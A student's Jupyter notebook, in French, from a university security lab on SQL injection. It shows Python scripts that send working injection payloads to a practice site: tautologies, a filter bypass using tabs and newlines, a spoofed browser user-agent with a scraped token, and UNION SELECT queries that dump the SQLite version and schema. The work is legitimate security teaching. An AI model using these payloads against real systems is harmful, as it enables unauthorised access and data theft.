# ipl I317B Sécurité : labos
## Semaine 2 : Vulnérabilitées web - Injection SQL (1)

### Exercice 1a:
Pour ce premier exercice, nous vous demandons de passer le formulaire de connexion codé par un mauvais développeur : http://labosecuipl.alwaysdata.net/23/s02/ex1a/

In [1]:
import requests

page = requests.post(
    "http://labosecuipl.alwaysdata.net/23/s02/ex1a/",
    data={
        "login": '" or 1=1;--',
        "password": ""
    }
)


if "Good job" in page.text:
    print("Exercice réussi")
else:
    print("Ho non :'-(")

Exercice réussi


Pouvez-vous en déduire la syntaxe de la requête SQL présente dans ce formulaire et dans laquelle votre injection fonctionne ?

### Exercice 1b:
Une variante du précédant formulaire a été mit en place, connectez-vous à nouveau à celui-ci : http://labosecuipl.alwaysdata.net/23/s02/ex1b/

In [12]:
import requests

page = requests.post(
    "http://labosecuipl.alwaysdata.net/23/s02/ex1b/",
    data={
        "login": '\' or 1=1;-- ',
        "password": ""
    }
)

if "Good job" in page.text:
    print("Exercice réussi")
else:
    print("Ho non :'-(")

Exercice réussi


Pouvez-vous en déduire la syntaxe de la requête SQL présente dans ce formulaire et dans laquelle votre injection fonctionne ?

### Exercice 2:
Une variante du précédant formulaire a été mit en place, connectez-vous à nouveau à celui-ci : http://labosecuipl.alwaysdata.net/23/s02/ex2/

In [2]:
import requests

page = requests.post(
    "http://labosecuipl.alwaysdata.net/23/s02/ex2/",
    data={
        "login": '\') or 1=1;-- ',
        "password": ""
    }
)

if "Good job" in page.text:
    print("Exercice réussi")
else:
    print("Ho non :'-(")

Ho non :'-(


Pouvez-vous en déduire la syntaxe de la requête SQL présente dans ce formulaire et dans laquelle votre injection fonctionne ?

### Exercice 3:
Dans cette nouvelle version, le développeur semble avoir prit conscience que certains caractères ne devraient pas être accepté ... mais vous êtes plus malin que lui, n'est-ce pas ?

http://labosecuipl.alwaysdata.net/23/s02/ex3/

In [6]:
import requests

page = requests.post(
    "http://labosecuipl.alwaysdata.net/23/s02/ex3/",
    data={
        "login": "",
        "password": '" or 1<3;--'.replace(" ", "\t"),
    }
)

if "Good job" in page.text:
    print("Exercice réussi")
else:
    print("Ho non :'-(")
    print(page.text)

Exercice réussi


### Exercice 4:

Une variante du précédant formulaire a été mit en place, il semblerait que notre mauvais dev veuille cette fois-ci empêcher les requêtes automatisées.
Encore une fois, trouvez le moyen de vous y connecter : http://labosecuipl.alwaysdata.net/23/s02/ex4/

In [7]:
import requests
from bs4 import BeautifulSoup

# on utilise un objet "Session" pour garder de la persistance (les cookies) d'une requête à l'autre.
session = requests.session()

# on se fait passé pour autre chose qu'une lib python en préparant un autre user-agent.
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'}

page_form = session.get(
    "http://labosecuipl.alwaysdata.net/23/s02/ex4/"
)
soup = BeautifulSoup(page_form.text)
token = soup.find("input", {"type": "hidden"})['value']

page = session.post(
    "http://labosecuipl.alwaysdata.net/23/s02/ex4/",
    data={
        "login": "",
        "password": '\' or 2;--'.replace(" ", "\n"),
        "token": token  # on ajoute le token récupéré précédement
    },
    headers=headers
)
print(page.text)

<!DOCTYPE html>
<html lang="en">
<p id='result'>Good job, it's time to do the next exercice !</p></html>



### Exercice 5:
Un espion sur place m'a confirmé que, ne parvenant pas à circonvenir nos injections, le dévelopeur derrière ce site à juste décidé de vider la base de donnée `users`. Il s'est venté bruyament de sa nouvelle idée à coté de la machine à café :

> "J'ai vidé la base de donnée ! Haha ! La requête sql de connexion ne peut plus renvoyé de login utilisateur donc impossible pour eux de se connecter ! Haha, ces maudits hackers ne m'auront pas cette fois-ci !".

Désormait, toutes les requêtes, même injectée "toujours vraie" sont vide ... C'est embêtant mais je suis sûr qu'on peut arranger le coup !

http://labosecuipl.alwaysdata.net/23/s02/ex5/

In [2]:
import requests

page = requests.post(
    "http://labosecuipl.alwaysdata.net/23/s02/ex5/",
    data={
        "login": " ' UNION SELECT null, null;-- ",
        "password": "",
    }
)

if "Good job" in page.text:
    print("Exercice réussi")
else:
    print("Ho non :'-(")
    print(page.text)

Exercice réussi


### Exercice 6a:
Pour ce nouvel exercice, nous allons utiliser un nouveau formulaire. Ce formulaire nous permet de chercher parmi les éléments du tableau périodique des éléments. Par exemple, si vous cherchez "Co*", vous obtiendrez les informations sur le copper (cuivre) et le cobalt.

http://labosecuipl.alwaysdata.net/23/s02/ex6/

Commencez par récupérer le numéro de version de notre base de donnée. Ici, nous connaissons le type de base de donnée : SQLITE, un petit détour par la documentation nous permet deconnaître la fonction parfait pour cela : https://www.sqlite.org/lang_corefunc.html#sqlite_version.

In [3]:
from bs4 import BeautifulSoup

def create_inject(fields, table=""):
    """
    Crée le string de l'injection
    
    fields: liste de string a mettre dans le SELECT.
    table: le nom de la table où on veut SELECT (optionnel)
    """
    while len(fields) < 21:
        fields.append("''")  # on ajoute suffisament de champ vide pour avoir 21 champs (pour le UNION)
    injection = " ' UNION SELECT " + ','.join(fields)
    
    if table:  # Un string vide est évalué à False
        injection += " FROM " + table
    injection += " ;--"
    
    print(injection)
    return injection

def inject(injection):
    """
    Procède à l'injection et retourne la page injectée
    
    injection: l'injection à soumettre sur le site
    """
    page = requests.get(
        "http://labosecuipl.alwaysdata.net/23/s02/ex6/",
        params={ "name": injection }
    )
    return page.text

def parse_page(html):
    """
    Parse le tableau de la page html et le retourne sous la forme d'une liste de liste.
    
    html: Un string représentant la page à parser.
    """
    soup = BeautifulSoup(html)
    result = []
    for tr in soup.find_all("tr")[1:]:
        row = []
        for td in tr.find_all("td"):
            row.append(td.text)
        result.append(row)
    return result

In [22]:
print(parse_page(inject(create_inject(["sqlite_version()"]))))

 ' UNION SELECT sqlite_version(),'','','','','','','','','','','','','','','','','','','','' ;--
[['3.27.2', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '']]


Pouvez-vous en déduire la syntaxe de la requête SQL présente dans ce formulaire et dans laquelle votre injection fonctionne ?

### Exercice 6b:
Dans le même ordre d’idée, je vous invite à récupérer la liste des tables présentes dans cette base de donnée.

Comme souvent, la lecture de la documentation peut vous faciliter la vie : https://www.sqlite.org/faq.html#q7

<sup><sub>(Et comme bien souvent ... la vrai vie c'est compliqué : https://www.sqlite.org/schematab.html#alternative_names )</sub></sup>

In [23]:
for row in parse_page(inject(create_inject(["name", "sql"], "sqlite_master"))):
    print("--------------")
    print("| " + row[0])
    print("--------------")
    print(row[1])
    print()

 ' UNION SELECT name,sql,'','','','','','','','','','','','','','','','','','','' FROM sqlite_master ;--
--------------
| elements
--------------
CREATE TABLE elements (name TEXT, symbol TEXT, atomic_number TEXT, atomic_weight TEXT, density TEXT, melting_point TEXT, boiling_point TEXT, atomic_radius TEXT, covalent_radius TEXT, ionic_radius TEXT, specific_volume TEXT, specific_heat TEXT, heat_fusion TEXT, heat_evaporation TEXT, thermal_conductivity TEXT, pauling_electronegativity TEXT, first_ionisation_energy TEXT, oxidation_states TEXT, electronic_configuration TEXT, lattice TEXT, lattice_constant TEXT)

--------------
| gemstones
--------------
CREATE TABLE gemstones(gemstone TEXT, crystal_system TEXT, density TEXT, hardness TEXT, refractive_index TEXT, threatments TEXT)

--------------
| planets
--------------
CREATE TABLE planets('planet' TEXT, 'Distance_from_Sun_per_million_km' TEXT, 'Year_Length_per_Earth_years' TEXT, 'Day_Length_per_Earth_Days' TEXT, 'Orbital_Speed_per_km_per_s' 

### Exercice 6c (bonus):
Maintenant que vous connaissez toutes les tables dans cette base de données ainsi que le nom de chaque champ, pourquoi ne pas récupérer le contenu de chacune de ces tables ?

In [57]:
#TODO